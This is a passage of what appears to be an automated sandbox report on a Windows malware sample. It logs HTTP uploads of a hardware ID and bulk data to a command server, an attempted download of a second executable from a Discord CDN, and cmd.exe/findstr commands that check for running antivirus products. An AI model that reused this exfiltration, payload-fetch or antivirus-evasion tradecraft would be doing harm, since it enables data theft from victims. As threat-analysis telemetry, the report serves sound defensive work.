                                                                  Content-Type: multipart/form-data; boundary=YIZA1LSGAC0PNGL
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 595685
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 2d 2d 59 49 5a 41 31 4c 53 47 41 43 30 50 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 59 49 5a 41 31 4c 53 47 41 43 30 50 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 59 49 5a 41 31 4c 53 47 41 43 30 50 4e 47 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 0d 0a 2d 2d 59 49 5a 41 31
                                                                  Data Ascii: --YIZA1LSGAC0PNGLContent-Disposition: form-data; name="hwid"CF8A1DDF42529BA3B960CC18D99B375A--YIZA1LSGAC0PNGLContent-Disposition: form-data; name="pid"1--YIZA1LSGAC0PNGLContent-Disposition: form-data; name="lid"VXGDR--Kat222--YIZA1
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 96 bf 3b 2e ef 74 5d 93 8e 0c 4e d4 26 57 41 5a 05 1e 50 66 fb 4e b7 87 17 a7 db 3b fc 50 84 1e 33 69 b1 59 8f 1e 57 23 bb 29 3f 7b ec 77 ff 96 71 74 d2 33 31 12 91 9a 89 98 94 35 8d d9 dc 55 10 b0 8f bc 17 7b 87 0b cc 0c a0 97 98 8d 85 b5 29 27 42 4b 65 6c 21 a4 37 d4 7f 7b da ce 1e 37 bc 1e e7 2a 16 13 78 b9 35 25 d2 2c 32 7c 80 e3 f4 7e 32 27 71 2e 59 f6 68 c6 13 4a d3 24 ba 39 33 23 ca 08 1b fd 5f f5 5b ec a6 79 8b 3c 59 6e 6c b4 b3 71 f2 2a 12 45 26 31 7c 9d 4e 22 41 36 5b 90 ee cb 41 44 ca 08 2f 88 7a cf 4d d8 ab 60 ba e3 2e 00 1a b0 29 df 76 07 43 ae c0 77 24 99 13 07 49 ad 28 12 5d 22 b8 b3 8d 58 70 81 0b 9a 51 ea 91 80 eb b1 29 ed 0b 8a 79 ae 95 b8 7a 19 92 1d a5 fd 0e c0 17 dd bd c5 ff 04 a6 7d 3a 72 cb 84 03 5b 4a 3c 2e ff d2 0c ce 1f 4f 02 fc
                                                                  Data Ascii: ;.t]N&WAZPfN;P3iYW#)?{wqt315U{)'BKel!7{7*x5%,2|~2'q.YhJ$93#_[y<Ynlq*E&1|N"A6[AD/zM`.)vCw$I(]"XpQ)yz}:r[J<.O
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: ad 1e d2 5f 6f fc 5b a1 e0 6d 34 b7 83 a6 75 ff 4d d0 06 7e 89 7c 24 6e 48 82 93 6f 15 5c 1b 71 be ce 3a 31 cf 88 6f 92 88 df 82 4d 77 8e dd dd 2e 8c 06 c9 27 e4 0e b2 e2 3f 47 fa ed 95 ef ed 12 3b b0 9d 13 c0 5f 60 44 35 40 d5 d0 fd 0f 11 d3 e0 59 fc 47 2c 71 ac 36 2e e8 e0 56 e6 2a 92 0a a4 62 c5 85 b2 ea fd a7 35 d8 5f f1 ea 1d 9c 1c f2 05 02 ec 1b af cb 2f 61 52 16 15 af f7 e0 35 dc 81 09 88 68 e4 7f f1 4f bd 61 05 ca 0b 93 32 35 14 6d ab e6 08 eb d8 94 cb 4d b1 ba d6 b3 cf d4 c7 c4 96 75 d9 b8 a3 7e c9 16 5c c6 bf fa 46 35 f0 ae 7f 66 7d 4d ce 9f 3e b3 63 34 94 2d 3c 7b 60 29 01 32 c6 46 08 8f d7 bd 79 24 74 b8 45 8e 2c 3b 1c 82 50 00 3d 66 8f 7c 0e 73 81 87 64 42 aa e2 28 dd 51 c4 61 ba a7 0b cb d8 b7 9a e5 b8 0d 3f 4a c7 08 38 07 b0 8b 7b a2 61 ca
                                                                  Data Ascii: _o[m4uM~|$nHo\q:1oMw.'?G;_`D5@YG,q6.V*b5_/aR5hOa25mMu~\F5f}M>c4-<{`)2Fy$tE,;P=f|sdB(Qa?J8{a
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: ff 50 69 c7 c6 e7 c7 7b 7b a6 14 75 87 9a 68 f2 b2 44 27 a9 93 47 a9 4d ec 8c 88 75 6b 2f 03 20 c7 a9 7b 86 c4 76 34 60 7f 37 f9 3d 0f 34 18 5c 8c 78 00 11 24 5e a2 3e 0e 25 65 4b fb 01 18 7d 85 50 9e 62 ef e7 6f 60 dc bd 9d dc 92 d2 24 d6 62 64 09 92 a4 46 57 76 27 ea fa 9d ad 4c 4c 2a 0b 16 f8 3d 30 22 14 28 f6 b7 17 05 da 36 92 82 c0 b3 8d 1d da 48 2d 24 6f d2 0d 7b b2 bd 55 c8 f4 04 11 4a 42 2a 92 72 9d 9c 43 7e e7 fe db 29 72 5c 51 e7 b7 06 e7 20 14 f5 08 5d 39 22 ca de 08 16 00 6a 2f 4e bb e9 f2 69 a1 bb 8a 2e 06 3f e4 e2 9f 8c d0 b9 31 51 d3 bf a3 1f 43 3c cf 60 50 0a 78 4b 6d 19 a1 5e a0 4c 86 b1 23 0e 1e 34 00 de c1 56 c4 22 a0 c9 cf e6 17 07 c5 92 5c 9f 9d 08 27 14 70 0f f8 75 e1 9b ab 10 e7 fa ea c5 73 a7 13 11 14 93 82 ba 4c 88 20 b4 b9 b5 4e
                                                                  Data Ascii: Pi{{uhD'GMuk/ {v4`7=4\x$^>%eK}Pbo`$bdFWv'LL*=0"(6H-$o{UJB*rC~)r\Q ]9"j/Ni.?1QC<`PxKm^L#4V"\'pusL N
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 3c 41 cb cf cf 37 6c db d0 62 f3 5a fc ed 18 4d f7 06 59 f4 ee 51 d5 42 db d0 9c 92 8e e6 53 26 b0 d9 b8 d4 59 9b 42 5a ff fe 53 89 38 b7 ec 6a 70 2e 85 6f bb 84 b8 94 b8 60 a7 61 88 73 cb 5a c1 36 8a e0 c6 b2 2c f9 83 fa 23 ff f4 b7 17 11 66 c1 60 e0 9d 68 35 27 c8 3c b7 13 b5 7a 59 49 af 1c 09 4d 83 bf 58 e8 06 66 f1 f0 bc d7 49 c2 7b 3e 69 ec 9d 00 57 3e b8 36 71 5c f4 b7 3c 81 82 4f 88 45 45 64 6e a0 5f a9 a6 9f 76 2d 5e 79 3c df 80 e2 3f b8 22 e6 12 6b a8 8f 98 fe 9d 8f e1 ea d2 ac 8f 27 e6 fa 88 f4 30 de 74 fe 2e 9f 55 de e1 d2 96 b5 c3 73 6e db 83 44 ec ef 25 b9 0b 38 d3 3d c4 c2 23 f6 83 49 72 af 1c d3 d2 ad b3 a2 2a fa 75 24 96 ce 91 72 53 85 98 7e 2f c4 5c 67 29 aa 65 b6 c0 c3 bd a2 82 10 df 65 7d 92 30 85 eb be 31 56 fb 90 38 5c 60 8a 77 24 d7
                                                                  Data Ascii: <A7lbZMYQBS&YBZS8jp.o`asZ6,#f`h5'<zYIMXfI{>iW>6q\<OEEdn_v-^y<?"k'0t.UsnD%8=#Ir*u$rS~/\g)ee}01V8\`w$
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: c7 e8 7a fc c0 56 14 49 6b 85 69 22 06 e4 e0 97 ec c6 0a 95 c0 f2 27 af ed 39 66 8d ed 70 7c 25 9a fa 40 94 1b 8c 7c cf 4f d5 43 d0 16 29 9c 9d f2 0a 76 b4 dc 76 2d 11 84 e0 33 e4 e8 72 a4 8c fb 3b ed a7 b9 79 f3 da 35 8e 8d 0b 25 92 55 f6 29 c0 9f d4 95 c1 ec ad d3 21 d1 52 39 33 e9 de 44 81 a5 6f ee 9b 63 59 4e a2 e4 7c b7 00 bf eb 27 ff 83 c8 5a 84 14 5d 50 28 85 d5 8c 45 3c 86 23 a1 08 ea 4a 54 14 35 c4 75 a9 40 00 14 f6 7c 4b b0 85 69 5f d8 69 b7 3a dd cd ec 1d d8 94 0e 0d df dd b0 57 20 0d 06 8e 60 a5 cb 73 2c e1 b7 14 c4 c8 6a 51 94 00 7c e1 7d cd b3 09 f8 42 db 57 ff e1 80 f2 f4 2a f5 fc 24 2b 4a a1 36 80 5e 78 98 57 e9 3e e7 ca 85 ee b9 da 73 f7 62 ad 8e 20 a8 43 0a 79 17 c8 52 02 d1 bb 87 21 a1 e4 30 09 ca 4d a0 aa a6 b2 f4 54 74 d3 59 24 52 77
                                                                  Data Ascii: zVIki"'9fp|%@|OC)vv-3r;y5%U)!R93DocYN|'Z]P(E<#JT5u@|Ki_i:W `s,jQ|}BW*$+J6^xW>sb CyR!0MTtY$Rw
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 4f 93 bd 72 bd 1e 15 1e 49 d1 1e 53 91 5a b5 59 cc 94 85 e4 a2 a6 5e 1c 70 5f 72 a4 63 23 85 25 3b 1e d5 0a 0c 98 4c a5 57 70 b0 e8 f5 17 af 90 78 fc 23 00 ff 9f f8 3e ee ed e2 d1 44 7e 52 78 9d c2 3b a4 d9 58 16 52 b5 17 b8 d8 84 c2 04 43 95 b7 9d 91 95 15 5f 68 2a 13 8e db 5a 4b 51 07 b9 00 40 1b 80 83 05 1f 8d 31 64 e5 e8 b0 83 3c 75 df 0f fd 70 10 c4 86 11 ce 1a a5 9c 55 8d db b9 08 a8 20 90 7f 52 fe 6b 60 d7 5d cc 16 76 5b 89 89 54 8a 2c eb c4 16 a8 ef c0 4c 69 34 18 07 f9 e4 a7 c7 e1 f6 28 1c 9e 9b d0 72 e5 f1 0d 3a d8 70 e6 2c 09 bb f5 af d3 a2 a2 6c 99 20 88 56 a0 89 02 c4 c2 21 d0 78 75 42 4d 40 db 4a 8c d0 07 56 ac 79 35 7c 64 7e 26 27 a1 b1 07 2d 1f c8 5b 1f 0c cc 83 d9 0c d1 15 df e7 af 6a 1d 56 e1 9e 1c 29 a3 c4 6c d4 93 b0 8c 5d a5 86 00 d7
                                                                  Data Ascii: OrISZY^p_rc#%;LWpx#>D~Rx;XRC_h*ZKQ@1d<upU Rk`]v[T,Li4(r:p,l V!xuBM@JVy5|d~&'-[jV)l]
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 85 e3 28 a6 7f 4d 02 9c 83 6a 7c 41 d7 ec 53 a9 f0 88 1e e6 a3 10 6c ad 43 f6 d7 c5 01 a7 09 26 87 59 16 41 75 0c fc bd a4 f1 31 fb 2a 5f 3f d7 c1 f6 26 31 0f 22 85 b9 15 3c 67 c6 c9 ff 1a d3 f1 b5 76 ec 6f b6 9b 00 97 4c cb cb 92 5f e5 4a 95 bf 8b 99 9d c7 d9 4a f5 9d 62 9d 81 ff 2d 0a e6 9b 56 d8 07 43 84 eb 5f d2 f5 b2 36 ad 96 8a 96 d3 07 43 8e 58 30 fb 99 45 10 aa 5e 22 e9 2a 26 09 95 b1 da a1 17 6a 97 5d e1 17 72 90 13 0a cd 60 5f 72 c8 16 0c 1d 3a bb 5a 6b 5d 71 45 8d 97 68 3e 27 90 51 b6 e4 d8 e0 13 2c 03 7a 4b 17 71 b5 76 fc 66 93 e4 c5 15 97 8d 22 e7 fa 8a ad 22 54 d5 17 9d ea fa c5 bf 2c 8d da ca c4 c0 80 16 76 44 d5 ed f0 d3 28 55 21 97 ef bd aa 23 4d 12 65 85 17 4e 18 8a e7 e0 3d 9a 18 77 f9 6c 77 d2 62 c2 94 84 ee 75 ff da fa b6 f7 a1 d0 e3
                                                                  Data Ascii: (Mj|ASlC&YAu1*_?&1"<gvoL_JJb-VC_6CX0E^"*&j]r`_r:Zk]qEh>'Q,zKqvf""T,vD(U!#MeN=wlwbu
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 07 fe 6e 6f 6b 5b af d3 88 2b 6d 68 21 d6 56 3a 58 a8 ed 27 b8 8e 33 06 ab a6 ab 5c 4d 37 27 c2 99 6b ad cb 02 4e 62 c2 91 fa f6 d1 74 bd d7 77 64 17 0c cf 35 f5 12 07 35 05 68 9e 7c 1b 6f 74 40 de ce e0 9b 67 2f 96 13 0a 86 11 03 ff 73 50 38 68 fd a7 9f 85 30 98 45 31 7d 91 c0 d7 e9 5a d5 2f bd cf 9a 44 b7 1a 2e 41 64 ee c3 13 ae 6b 5f ed 2a 74 13 04 0c 6b 69 cf 9b 89 4d ae 98 23 01 dd c8 9a 01 d9 d2 a1 08 92 20 34 96 47 eb be ed 70 ce 63 c7 13 11 fe 7f 87 66 60 e0 3d 58 8e ca d8 58 07 b9 65 90 cb b1 6a f6 a1 1c 54 54 c0 61 84 1b 19 ab 48 a3 11 b3 5e be dd 29 07 80 f0 aa ea 11 94 8b 05 d0 26 c7 b3 75 4e 33 85 35 84 5b 8e e1 66 80 09 ca bf 21 51 ce fd c5 8e 35 05 f5 6d 96 18 45 e5 a0 af 10 ad 63 f3 76 5c a0 59 06 ae 42 99 e4 2b 74 3c 49 52 75 a0 8a 81 db
                                                                  Data Ascii: nok[+mh!V:X'3\M7'kNbtwd55h|ot@g/sP8h0E1}Z/D.Adk_*tkiM# 4Gpcf`=XXejTTaH^)&uN35[f!Q5mEcv\YB+t<IRu
                                                                  2025-01-15 15:02:01 UTC15331OUTData Raw: 6c e1 d9 c1 d0 47 2b c7 10 a7 d5 62 42 44 81 16 a9 b2 56 df 24 0c bf d8 98 61 3c 10 24 78 f9 cf 88 1c 09 df 96 b1 c5 12 80 e7 67 e8 9d 55 02 cb 5f 66 32 da de 2f 37 7e 1b 52 62 0e 8d 44 e0 57 cd 0c 74 c7 68 4f 97 b0 fe 36 bd 07 a3 63 62 19 83 13 51 7e 7c e5 fa 5a 5d 85 ae 69 e5 63 7d b8 21 cc e2 64 ab d9 80 ab 64 bd fa f6 d0 58 bc 9e 75 69 e2 83 85 3e 2e b2 ef e6 1f 80 3b 62 54 81 bc 26 af 54 49 f9 ae 21 33 13 34 3c c3 e8 5c 2f 6b e4 9d e8 6c 1b 9a 8b 72 1f 68 34 18 8a 3e 2c 10 73 51 66 63 b4 c8 5f 3c ae b4 cb 95 8b 71 bb b1 ad 6c 46 7f 61 bd 76 ed 51 e5 b9 c3 b7 ab ad f9 cf d9 d8 36 3e ae d5 20 29 88 b8 f2 fc 2d 62 3b f8 a0 34 3e a4 73 70 21 a6 ed c2 5d 1f d0 5c a3 ff 6f 2c ed af 26 ae 2b f6 48 e5 4b 06 be 76 ca d2 3f ee 5d 91 e9 35 39 8d 91 37 c4 93 e5
                                                                  Data Ascii: lG+bBDV$a<$xgU_f2/7~RbDWthO6cbQ~|Z]ic}!ddXui>.;bT&TI!34<\/klrh4>,sQfc_<qlFavQ6> )-b;4>sp!]\o,&+HKv?]597
                                                                  2025-01-15 15:02:03 UTC1150INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:02:03 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=8c95dd45c9fjk92qf4cmg8a036; expires=Sun, 11 May 2025 08:48:41 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlKi6lVfZOsRwzoyR%2FXgiwCym2OxL%2FkWmDNAvR%2BnetO25doMK1Crg%2B5gDm%2BjrIPGk%2Ftaa0h3SnSpc%2B%2FgpbuPyrX4%2FwKfV2U5WrxWmU%2FcupBD83FgDPWLlZPZtd0b%2FPKoiqFSItnd"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026be93699ca24e-YUL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=17875&min_rtt=17871&rtt_var=6711&sent=206&recv=611&lost=0&retrans=0&sent_bytes=2847&recv_bytes=598298&delivery_rate=163037&cwnd=32&unsent_bytes=0&cid=c82fe1c21f0ba81b&ts=1724&x=0"


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.549936188.114.96.34435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:02:03 UTC267OUTPOST /api HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Content-Length: 82
                                                                  Host: aleksandr-block.com
                                                                  2025-01-15 15:02:03 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 56 58 47 44 52 2d 2d 4b 61 74 32 32 32 26 6a 3d 26 68 77 69 64 3d 43 46 38 41 31 44 44 46 34 32 35 32 39 42 41 33 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                  Data Ascii: act=get_message&ver=4.0&lid=VXGDR--Kat222&j=&hwid=CF8A1DDF42529BA3B960CC18D99B375A
                                                                  2025-01-15 15:02:04 UTC1124INHTTP/1.1 200 OK
                                                                  Date: Wed, 15 Jan 2025 15:02:04 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Set-Cookie: PHPSESSID=avklloc07vaja7ma5uh0mh4asi; expires=Sun, 11 May 2025 08:48:43 GMT; Max-Age=9999999; path=/
                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                  Pragma: no-cache
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 1; mode=block
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7yT74t26DpWF2rzsU7NTqvmjrU6%2Bo4tal%2BXQwTapQTpl5PmDZCfPjoe40L2xxJn0E6UfDY45MUD1FzMe0UHwLVnN6YhWNEpz7uftdgQ9ScVsPEQnAyj9y5bmXvshnfuDntn8YdW"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026bea1b8f9a2cc-YUL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=17907&min_rtt=17885&rtt_var=6752&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=985&delivery_rate=161629&cwnd=32&unsent_bytes=0&cid=4954b1981bb6fadd&ts=582&x=0"
                                                                  2025-01-15 15:02:04 UTC245INData Raw: 31 61 34 0d 0a 61 79 76 63 54 6b 52 2b 44 62 64 46 32 51 52 65 75 49 4b 57 58 48 35 52 52 72 4d 6c 50 39 4a 59 47 48 2b 32 54 6d 73 6d 32 6e 55 77 55 50 34 37 5a 6b 51 76 33 7a 47 74 64 43 32 43 33 72 6b 41 55 54 6f 71 32 6c 56 56 73 79 70 78 47 64 63 76 52 56 57 79 47 68 74 33 38 79 63 71 43 6c 4c 55 4b 61 6c 62 4c 73 72 74 38 48 49 4b 4b 54 4b 52 43 52 32 30 4c 44 70 46 68 6d 4a 4a 51 2f 68 50 57 31 62 77 4e 57 59 4c 4c 34 31 6e 73 58 41 71 79 50 47 73 41 46 45 4e 61 64 42 42 55 66 77 38 63 51 7a 56 49 52 6c 43 75 77 55 62 42 62 38 68 4b 53 49 69 31 6a 47 74 5a 54 33 51 37 2f 4d 79 43 69 49 61 6e 42 51 4d 34 32 34 6f 52 6f 46 37 57 52 66 71 54 56 4d 63 37 6e 74 31 54 6a 72 72 61 75 67 33 62 49 36 77 6f 47 52 49 59 33 61 43
                                                                  Data Ascii: 1a4ayvcTkR+DbdF2QReuIKWXH5RRrMlP9JYGH+2Tmsm2nUwUP47ZkQv3zGtdC2C3rkAUToq2lVVsypxGdcvRVWyGht38ycqClLUKalbLsrt8HIKKTKRCR20LDpFhmJJQ/hPW1bwNWYLL41nsXAqyPGsAFENadBBUfw8cQzVIRlCuwUbBb8hKSIi1jGtZT3Q7/MyCiIanBQM424oRoF7WRfqTVMc7nt1Tjrraug3bI6woGRIY3aC
                                                                  2025-01-15 15:02:04 UTC182INData Raw: 48 41 62 71 61 69 6c 4c 6a 6e 73 33 43 5a 67 41 48 31 2b 76 48 54 41 52 66 39 34 67 71 69 6f 37 77 4f 65 70 4f 51 5a 73 63 49 51 53 57 72 45 2b 4c 6b 69 51 4a 78 67 62 37 45 4a 63 54 2b 73 71 49 55 6b 72 33 79 6a 6b 4e 54 75 49 74 2f 52 74 47 47 46 2f 67 68 51 50 36 32 77 73 54 59 4a 38 58 68 43 2b 52 6c 70 4e 37 33 35 32 53 57 6d 50 64 72 73 78 62 49 76 67 6f 7a 35 4f 59 79 53 4b 51 51 65 77 50 69 70 47 6a 69 67 4f 52 2b 78 47 44 52 71 36 65 43 46 4c 62 49 52 39 75 79 4a 38 6c 4b 44 77 4b 46 78 72 64 70 38 48 57 76 42 69 4b 41 4c 72 0d 0a
                                                                  Data Ascii: HAbqailLjns3CZgAH1+vHTARf94gqio7wOepOQZscIQSWrE+LkiQJxgb7EJcT+sqIUkr3yjkNTuIt/RtGGF/ghQP62wsTYJ8XhC+RlpN7352SWmPdrsxbIvgoz5OYySKQQewPipGjigOR+xGDRq6eCFLbIR9uyJ8lKDwKFxrdp8HWvBiKALr
                                                                  2025-01-15 15:02:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  9192.168.2.549944162.159.135.2334435064C:\Users\user\AppData\Local\Temp\755831\Dl.com
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-15 15:02:04 UTC354OUTGET /attachments/1316097521088725107/1326268620199821485/ButtsStories.exe?ex=677ecf67&is=677d7de7&hm=1e05b1f0911094424256d31f3027d83b523b5b02b9d8bf298fea63f1f6e5a38b& HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                  Host: cdn.discordapp.com
                                                                  2025-01-15 15:02:04 UTC1058INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 15 Jan 2025 15:02:04 GMT
                                                                  Content-Type: text/plain;charset=UTF-8
                                                                  Content-Length: 36
                                                                  Connection: close
                                                                  Set-Cookie: __cf_bm=EsSKsXDmcHLm.dXxGEfHUoP8mEwRWEq2Rw.Eu12PVJw-1736953324-1.0.1.1-5CNa2N7oSiI7jlCvDyYizO2bkUYYHZfMO2Amrb_r_Eq5t2ddHsIHrifzY.k1axsKXrkCWIditXJpCna8fvX9Sw; path=/; expires=Wed, 15-Jan-25 15:32:04 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mwtT8SQR1uXqKjr7c4QmzEr1gRXJYGGnxt8ih4qkfqYvzs3WapkKsxUxNlJAHeSthi0cfTzsN8XCXRQPVBgVIN0mCSi4PeXsCS5q4mZIRyhoBo9%2BPsl1Qzjc2e7dCeKm6Byafw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                  Set-Cookie: _cfuvid=g0DRSKagsAOIEDLLE9F.gnaoB0uWbAAAB2df4dU0fPk-1736953324952-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                  Server: cloudflare
                                                                  CF-RAY: 9026bea8d8fbc47f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2025-01-15 15:02:04 UTC36INData Raw: 54 68 69 73 20 63 6f 6e 74 65 6e 74 20 69 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 76 61 69 6c 61 62 6c 65 2e
                                                                  Data Ascii: This content is no longer available.


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:10:01:17
                                                                  Start date:15/01/2025
                                                                  Path:C:\Users\user\Desktop\MotivatedFunded.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\MotivatedFunded.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'158'388 bytes
                                                                  MD5 hash:374EC1E6084A7E4E8CE505C8EB54D157
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:10:01:19
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c move Calculator Calculator.cmd & Calculator.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:10:01:19
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:10:01:21
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0x660000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:10:01:21
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                  Imagebase:0x270000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:10:01:21
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:tasklist
                                                                  Imagebase:0x660000
                                                                  File size:79'360 bytes
                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:10:01:21
                                                                  Start date:15/01/2025
                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                  Imagebase:0x270000
                                                                  File size:29'696 bytes
                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:8
                                                                  Start time:10:01:22
                                                                  Start date:15/01/2025
